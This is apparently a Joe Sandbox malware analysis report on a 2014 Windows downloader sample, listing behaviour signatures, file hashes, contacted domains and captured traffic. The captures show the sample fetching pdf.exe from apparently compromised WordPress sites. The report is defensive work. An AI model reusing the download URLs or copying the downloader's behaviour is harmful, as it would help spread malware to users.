Joe Sandbox Cloud Analysis Report

Loading ...

Analysis Report

Overview

General Information

Analysis ID:44368
Start time:13:04:36
Start date:05/06/2014
Overall analysis duration:0h 2m 53s
Report type:full
Sample file name:Ref_12242013.exe
Cookbook file name:Force HTTP.jbs
Analysis system description:XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
HCA enabled:false
Warnings:
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection

StrategyReport FP/FN
Threshold malicious


Signature Overview

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Installs a raw input device (often for capturing keystrokes)Show sources

Networking:

barindex
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Urls found in memory or binary dataShow sources
Downloads files from webservers via HTTPShow sources
Found strings which match to known social media urlsShow sources
Performs DNS lookupsShow sources

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources

Data Obfuscation:

barindex
Binary may include packed or encrypted dataShow sources
PE sections with suspicious entropy foundShow sources

System Summary:

barindex
Binary contains paths to debug symbolsShow sources
Creates files inside the user directoryShow sources
Creates temporary filesShow sources
Reads ini filesShow sources
Spawns processesShow sources
Enables driver privilegesShow sources
Reads the hosts fileShow sources

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Deletes itself after installationShow sources
Icon mismatch, uses an Icon from a different legit application in order to fool usersShow sources

Yara Overview

No Yara matches

Startup

  • system is xp
  • cleanup

Created / dropped Files

File PathType and Hashes
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ieupdater.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: DE158F1023935942A4ECED310FA6BBB5
  • SHA: 092EB490F6146DE14DEAB416626850396AA11F34
  • SHA-256: CC2E26FC310FC07BCCF8C8EEEF0EBA20E17F383B0E6A3A112F24ABF83765A7F1
  • SHA-512: D2BCB8774A641212B053A57196A281CD420A1A972533F9639136AEA84FBFD4C73710A7C5DA739EAE7804BEF90261FF4ADCA328EF557B489E6043DEB182F134F6
C:\Documents and Settings\Administrator\Cookies\administrator@bestwsos[1].txt
  • Type: ASCII text
  • MD5: 4DECF659BF3F2F3AFBCAB781DCDA0E79
  • SHA: CABECF4787017E5CE695A7C9BB4316C94302E778
  • SHA-256: 38992A1FB0C9331290CE6B491ACD9AC047A6ED4F3AE3EBA61774E38339D0609A
  • SHA-512: 1A8BFA5651B9DE98AF0F086F877A6FC7647278E2AAA0AB20327EAD68E8743F6B91D8A1675B735FFD0C4444233EFE8D4C165A7CF943AF35EB721CF25E51236262
\ROUTER
  • Type: Hitachi SH big-endian COFF object, not stripped
  • MD5: 00F949395144E159C79F8FB7BD4F0C68
  • SHA: 985003D3F6209DB96467BA9B611011752C322F2C
  • SHA-256: 5F7BD7A9EB12D5FD356FCD02EB0E6281785BBC1E81F8FCE2B59C7B2CAE3EA899
  • SHA-512: A227A7F1348E6864295986547F91611CD1F4215BE21930422A6B85764B220D64518C828C5A44CE858A7EB6561413C51853DF8F98C673C284D3F026A1AC354A5D

Contacted Domains/Contacted IPs

Contacted Domains

NameIPName ServerActiveRegistrare-Mail
ruedigerbaltissen.com38.102.226.69ns10.hostthename.com ns11.hostthename.com trueENOM, INC.abuse@enom.comRB0202@VERSANET.DE
bestwsos.com64.74.223.34dns5.name-services.com dns4.name-services.com dns2.name-services.com dns1.name-services.com dns3.name-services.com trueENOM, INC.abuse@enom.comBF7915C5B1A94260AEF5C0EF3119EEDE.PROTECT@WHOISGUARD.COM

Contacted IPs

IPCountryPingableOpen Ports
38.102.226.69United Statesunknownunknown
64.74.223.34United Statesunknownunknown
195.186.1.121Switzerlandunknownunknown

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
File name:Ref_12242013.exe
File size:12800
MD5:c77dd48c57156a20f0e32022e489546e
SHA1:cc0b69c3f49bb1bc7582acb81f38f7575d8d2d27
SHA256:850306c83bf6c5bfa1d2829af351f78cab01a1d81c7babfe6d54fb31eddf2f7a
SHA512:0579f7711b47d9937a2fcd658f579a4ce37451d3494b6a353501bc3849c8bae4d5e33af1ba442bf2b6adb77202df54369451b5c70f94d0e9720105ee9502320e

File Icon

Static PE Info

General

Entrypoint:0x401ebd
Entrypoint Section:.text
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x52B958BB [Tue Dec 24 09:49:47 2013 UTC]
TLS Callbacks:
Digitally signed:False
CLR (.Net) Version:

Resources

NameRVASizeTypeLanguageCountry
RT_ICON0x52780xea8dataEnglishUnited States
RT_DIALOG0x61380xe4dataEnglishUnited States
RT_GROUP_ICON0x61200x14MS Windows icon resource - 1 iconEnglishUnited States
RT_MANIFEST0x51300x148XML document textEnglishUnited States

Imports

DLLImport
USER32.dllRegisterClassExW, CreateWindowExW, GetMessageW, TranslateMessage, DispatchMessageW, DefWindowProcW, PostQuitMessage, ShowWindow, UpdateWindow, PostMessageA, SetWindowTextW
KERNEL32.dllGetStartupInfoA, GetModuleHandleA, GetModuleHandleW, CloseHandle, CreateFileW, WriteFile, ReadFile
GDI32.dllSetBkColor
MSVCRT.dll__getmainargs, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _exit, _XcptFilter, exit, _acmdln, _initterm

Sections

NameVirtual AddressVirtual SizeRaw SizeEntropy
.text0x10000x104c0x12006.81171312431
.rdata0x30000x4c60x6004.69578017663
.data0x40000x1d00x2003.97788180894
.rsrc0x50000x12200x14004.73910067186

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jun 5, 2014 13:05:16.403152943 CEST5990253192.168.1.10195.186.1.121
Jun 5, 2014 13:05:16.653805971 CEST5359902195.186.1.121192.168.1.10
Jun 5, 2014 13:05:16.662504911 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:05:16.662533998 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:16.662647009 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:05:16.667073965 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:05:16.667093992 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.383740902 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.397274017 CEST6395253192.168.1.10195.186.1.121
Jun 5, 2014 13:05:17.434500933 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.434983969 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:05:17.435038090 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.512768984 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.513273954 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:05:17.513328075 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.590457916 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.590964079 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:05:17.591017008 CEST80103164.74.223.34192.168.1.10
Jun 5, 2014 13:05:17.719928980 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:05:17.742078066 CEST5363952195.186.1.121192.168.1.10
Jun 5, 2014 13:05:17.754154921 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:17.754172087 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:17.754261017 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:17.755517006 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:17.755537033 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.099504948 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.250854015 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.250878096 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.253633976 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:05:19.253663063 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:19.253772974 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:05:19.254935026 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:05:19.254955053 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:19.292107105 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.292115927 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.292241096 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.292253971 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.292370081 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.306098938 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.322273016 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.322300911 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.322763920 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.322809935 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.323215961 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.341712952 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.341742039 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.341753006 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.342345953 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.342390060 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.342797041 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.342834949 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.470024109 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.980375051 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:19.982242107 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.982270002 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:19.982392073 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.983627081 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:19.983638048 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:20.093738079 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:20.093748093 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:20.094027042 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:05:20.094058037 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:20.094402075 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:05:20.129718065 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:20.130269051 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:20.130780935 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:05:20.130831957 CEST80103364.74.223.34192.168.1.10
Jun 5, 2014 13:05:20.344394922 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:05:21.315256119 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.438119888 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:21.438172102 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.470055103 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.470083952 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.470094919 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.470510960 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:21.470556021 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.470729113 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:21.473357916 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.473386049 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.473906994 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:21.473948956 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.474374056 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:21.482744932 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.519324064 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.519355059 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.519366026 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.519764900 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:21.519810915 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:21.519962072 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:21.657130003 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:05:34.260359049 CEST80103238.102.226.69192.168.1.10
Jun 5, 2014 13:05:34.260802031 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:05:36.471697092 CEST80103438.102.226.69192.168.1.10
Jun 5, 2014 13:05:36.471818924 CEST103480192.168.1.1038.102.226.69
Jun 5, 2014 13:07:21.722714901 CEST103180192.168.1.1064.74.223.34
Jun 5, 2014 13:07:21.723237038 CEST103280192.168.1.1038.102.226.69
Jun 5, 2014 13:07:21.723484993 CEST103380192.168.1.1064.74.223.34
Jun 5, 2014 13:07:21.723727942 CEST103480192.168.1.1038.102.226.69

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jun 5, 2014 13:05:16.403152943 CEST5990253192.168.1.10195.186.1.121
Jun 5, 2014 13:05:16.653805971 CEST5359902195.186.1.121192.168.1.10
Jun 5, 2014 13:05:17.397274017 CEST6395253192.168.1.10195.186.1.121
Jun 5, 2014 13:05:17.742078066 CEST5363952195.186.1.121192.168.1.10

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Jun 5, 2014 13:05:16.403152943 CEST192.168.1.10195.186.1.1210x8b47Standard query (0)bestwsos.comA (IP address)IN (0x0001)
Jun 5, 2014 13:05:17.397274017 CEST192.168.1.10195.186.1.1210x15daStandard query (0)ruedigerbaltissen.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Jun 5, 2014 13:05:16.653805971 CEST195.186.1.121192.168.1.100x8b47No error (0)bestwsos.com64.74.223.34A (IP address)IN (0x0001)
Jun 5, 2014 13:05:17.742078066 CEST195.186.1.121192.168.1.100x15daNo error (0)ruedigerbaltissen.com38.102.226.69A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • bestwsos.com
  • ruedigerbaltissen.com

HTTP Packets

TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Jun 5, 2014 13:05:16.667073965 CEST103180192.168.1.1064.74.223.34GET /wp-content/uploads/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: bestwsos.com
0
Jun 5, 2014 13:05:17.383740902 CEST80103164.74.223.34192.168.1.10HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7478
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=6919fc02-27ef-4090-bed1-5234bf1fe9c6; path=/
Set-Cookie: VisitorID=582a28ee-461a-4a82-9824-efe49f9a92a1&Exp=6/5/2017 4:05:19 AM; expires=Mon, 05-Jun-2017 11:05:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 05 Jun 2014 11:05:19 GMT
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e
Data Ascii: <!doctype html><html>
1
Jun 5, 2014 13:05:17.434500933 CEST80103164.74.223.34192.168.1.10Data Raw: 0d 0a 09 0d 0a 3c 68 65 61 64 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65
Data Ascii: <head><meta charset="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/><meta name="viewport" content="width=device-width, initial-scale=1"/> <title>Bestwsos.com</title><meta name="keywords" con
2
Jun 5, 2014 13:05:17.435038090 CEST80103164.74.223.34192.168.1.10Data Raw: 2c 0d 0a 20 20 20 20 27 61 64 74 65 73 74 27 3a 20 27 6f 66 66 27 2c 0d 0a 20 20 20 20 27 68 6c 27 3a 20 27 27 0d 0a 7d 3b 0d 0a 0d 0a 76 61 72 20 73 65 61 72 63 68 62 6f 78 42 6c 6f 63 6b 20 3d 0d 0a 7b 0d 0a 20 20 20 20 27 63 6f 6e 74 61 69 6e
Data Ascii: , 'adtest': 'off', 'hl': ''};var searchboxBlock ={ 'container': 'searchbox', 'type': 'searchbox', 'width': '300px', 'widthSearchButton': 70, 'colorBackground': 'transparent', 'colorSearchButton':
4
Jun 5, 2014 13:05:17.512768984 CEST80103164.74.223.34192.168.1.10Data Raw: 74 48 61 73 68 27 3a 20 27 31 34 31 39 35 33 32 38 35 33 27 2c 0d 0a 20 20 20 20 27 74 69 6d 65 27 3a 20 27 36 2f 35 2f 32 30 31 34 20 34 3a 30 35 3a 31 39 20 41 4d 27 2c 0d 0a 20 20 20 20 27 74 69 63 6b 73 27 3a 20 27 36 33 35 33 37 35 33 37 39
Data Ascii: tHash': '1419532853', 'time': '6/5/2014 4:05:19 AM', 'ticks': '635375379192190049', 'domainName': 'bestwsos.com', 'searchText': '', 'actionCode': 'InitialView', 'adNetworkID': '2010001', 'moduleID': '29',
5
Jun 5, 2014 13:05:17.513328075 CEST80103164.74.223.34192.168.1.10Data Raw: 6b 69 6e 67 5f 66 6f 72 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 61 63 74 69 6f 6e 3d 22 2f 64 65 66 61 75 6c 74 2e 70 68 70 22 3e 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 0d 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d
Data Ascii: king_form" method="get" action="/default.php"> =================================================** START DEBUG OUTPUT **================================================= Version: 3.7.169.16
6
Jun 5, 2014 13:05:17.590457916 CEST80103164.74.223.34192.168.1.10Data Raw: 63 68 65 5f 54 69 6d 65 3a 20 36 6d 73 20 28 33 25 29 0d 0a 20 20 20 20 20 20 20 44 61 74 61 62 61 73 65 5f 54 69 6d 65 3a 20 31 39 6d 73 20 28 39 25 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 41 50 49 5f 54 69 6d 65 3a 20 31 37 32 6d 73 20 28
Data Ascii: che_Time: 6ms (3%) Database_Time: 19ms (9%) API_Time: 172ms (86%)=================================================** END DEBUG OUTPUT **=================================================--
7
Jun 5, 2014 13:05:17.591017008 CEST80103164.74.223.34192.168.1.10Data Raw: 74 72 79 20 7b 20 72 65 74 75 72 6e 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 27 29 3b 20 7d 20 63 61 74 63 68 28 65 29 20 7b 7d 0d 0a 20 20 74 72 79 20 7b 20 72 65 74 75 72 6e
Data Ascii: try { return new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) {} try { return new XMLHttpRequest(); } catch(e) {} return null;}GetIPPI('dd1fd096-500f-4ab9-9ad7-687dbf0d9749');</script><script type="text/javascript">var ga
8
Jun 5, 2014 13:05:17.755517006 CEST103280192.168.1.1038.102.226.69GET /wp-content/uploads/2012/09/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: ruedigerbaltissen.com
9
Jun 5, 2014 13:05:19.099504948 CEST80103238.102.226.69192.168.1.10HTTP/1.1 404 Not Found
Date: Thu, 05 Jun 2014 11:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://ruedigerbaltissen.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="CAO IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2a7b875c096aecdecb60c18df4bdcc6b; path=/
Set-Cookie: cookies=yes; expires=Thu, 05-Jun-2014 12:05:17 GMT
Transfer-Encoding: chu
Data Raw:
Data Ascii:
10
Jun 5, 2014 13:05:19.250878096 CEST80103238.102.226.69192.168.1.10Data Raw: 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 0a
Data Ascii: kedContent-Type: text/html; charset=UTF-834<!DOCTYPE html> [if IE 7]><html class="ie ie7" clang="en-US"33><![endif]--> [if IE 8]><html class="ie ie8" clang="en-US"38><![endif]--> [if !(IE 7) | !(IE 8) ]
10
Jun 5, 2014 13:05:19.254935026 CEST103380192.168.1.1064.74.223.34GET /wp-content/uploads/pdf.exe HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: bestwsos.com
Cookie: SessionID=6919fc02-27ef-4090-bed1-5234bf1fe9c6; VisitorID=582a28ee-461a-4a82-9824-efe49f9a92a1&Exp=6/5/2017 4:05:19 AM
10
Jun 5, 2014 13:05:19.292107105 CEST80103238.102.226.69192.168.1.10Data Raw: 32 61 0d 0a 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a 33 36 64 37 0d 0a 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72
Data Ascii: 2a> <![endif]--><head><meta charset="36d7UTF-8"><meta name="viewport" content="width=device-width"><title>Page not found | Betriebliche Altersvorsorge</title><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pin
12
Jun 5, 2014 13:05:19.292115927 CEST80103238.102.226.69192.168.1.10Data Raw: 79 74 68 69 72 74 65 65 6e 2f 63 73 73 2f 69 65 2e 63 73 73 3f 76 65 72 3d 32 30 31 33 2d 30 37 2d 31 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c
Data Ascii: ythirteen/css/ie.css?ver=2013-07-18' type='text/css' media='all' /><![endif]--><script type='text/javascript' src='http://ruedigerbaltissen.com/wp-includes/js/jquery/jquery.js?ver=1.10.2'></script><script type='text/javascript' src='http://
13
Jun 5, 2014 13:05:19.292253971 CEST80103238.102.226.69192.168.1.10Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6d 61 69 6c 3a 20 65 6d 61 69 6c 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 73 74 6e 61 6d 65 20 3a 20 6c 69 73 74 6e 61 6d 65 2c 0d 0a 20 20 20 20 20 20 20 20 20
Data Ascii: email: email, listname : listname, meta_web_form_id: meta_web_form_id, meta_message: meta_message, redirect: redirect, met
15
Jun 5, 2014 13:05:19.306098938 CEST80103238.102.226.69192.168.1.10Data Raw: 75 62 6c 65 6f 70 74 2c 72 65 64 69 72 65 63 74 2c 65 72 72 6f 72 72 65 64 69 72 65 63 74 2c 20 76 69 64 4e 75 6d 2c 20 76 69 64 50 61 67 65 49 64 29 0d 0a 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 64 61 74
Data Ascii: ubleopt,redirect,errorredirect, vidNum, vidPageId) { var data = { action: 'fanbuzzIcAddName', fields_fname : fields_fname, fields_lname: fields_
15
Jun 5, 2014 13:05:19.322273016 CEST80103238.102.226.69192.168.1.10Data Raw: 74 69 64 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 75 62 6c 65 6f 70 74 3a 20 64 6f 75 62 6c 65 6f 70 74 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 64 69 72 65 63 74 3a 20 72 65 64
Data Ascii: tid, doubleopt: doubleopt, redirect: redirect, errorredirect: errorredirect }; jQuery.post('/wp-admin/admin-ajax.php', data, function(){svphidehtml(vidNum
17
Jun 5, 2014 13:05:19.322300911 CEST80103238.102.226.69192.168.1.10Data Raw: 63 4e 61 6d 65 28 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 22 6c 69 6b 65 68 74 74 70 72 75 65 64 69 67 65 72 62 61 6c 74 69 73 73 65 6e 63 6f 6d 77 70
Data Ascii: cName() { return "likehttpruedigerbaltissencomwpcontentuploads201209pdfexe"; } function GcName() { return "gplushttpruedigerbaltissencomwpcontent
18
Jun 5, 2014 13:05:19.322809935 CEST80103238.102.226.69192.168.1.10Data Raw: 72 62 61 6c 74 69 73 73 65 6e 63 6f 6d 77 70 63 6f 6e 74 65 6e 74 75 70 6c 6f 61 64 73 32 30 31 32 30 39 70 64 66 65 78 65 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 09 3c 73 74 79 6c 65 20 74 79 70 65 3d
Data Ascii: rbaltissencomwpcontentuploads201209pdfexe"; }</script><style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <script type="text/javascript"> // <![CDATA[
19
Jun 5, 2014 13:05:19.341712952 CEST80103238.102.226.69192.168.1.10Data Raw: 69 67 65 72 62 61 6c 74 69 73 73 65 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 68 69 72 74 65 65 6e 2f 61 73 73 65 74 73 2f 65 78 70 72 65 73 73 69 6e 73 74 61 6c 6c 2e 73 77 66 22 3b 0a 20 09 76
Data Ascii: igerbaltissen.com/wp-content/themes/twentythirteen/assets/expressinstall.swf"; var imwbvp_ajaxurl = 'http://ruedigerbaltissen.com/wp-admin/admin-ajax.php'; // </script> </head><body class="error404 single-author"><div id="page" cl
20
Jun 5, 2014 13:05:19.341742039 CEST80103238.102.226.69192.168.1.10Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 65 61 72 63 68 22 20 2f 3e 0a 09 09 09 3c 2f 66 6f 72 6d 3e 09 09 09 09 3c 2f 6e 61 76 3e 3c 21 2d
Data Ascii: nput type="submit" class="search-submit" value="Search" /></form></nav> #site-navigation --></div> #navbar --></header> #masthead --><div id="main" class="site-main"><div id="primary" class="content-area"><
22
Jun 5, 2014 13:05:19.341753006 CEST80103238.102.226.69192.168.1.10Data Raw: 74 22 3e 53 65 61 72 63 68 20 66 6f 72 3a 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 69 65 6c 64 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22
Data Ascii: t">Search for:</span><input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /></label><input type="submit" class="search-submit" value="Search" /></form></aside><asid
23
Jun 5, 2014 13:05:19.342390060 CEST80103238.102.226.69192.168.1.10Data Raw: 69 74 61 72 62 65 69 74 65 72 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 3c 2f 61 73 69 64 65 3e 3c 61 73 69 64 65 20 69 64 3d 22 72 65 63 65 6e 74 2d 63 6f 6d 6d 65 6e 74 73 2d 32 22 20 63 6c 61 73 73
Data Ascii: itarbeiter</a></li></ul></aside><aside id="recent-comments-2" class="widget widget_recent_comments"><h3 class="widget-title">Recent Comments</h3><ul id="recentcomments"><li class="recentcomments">Fritz on <a href="http://ruedige
24
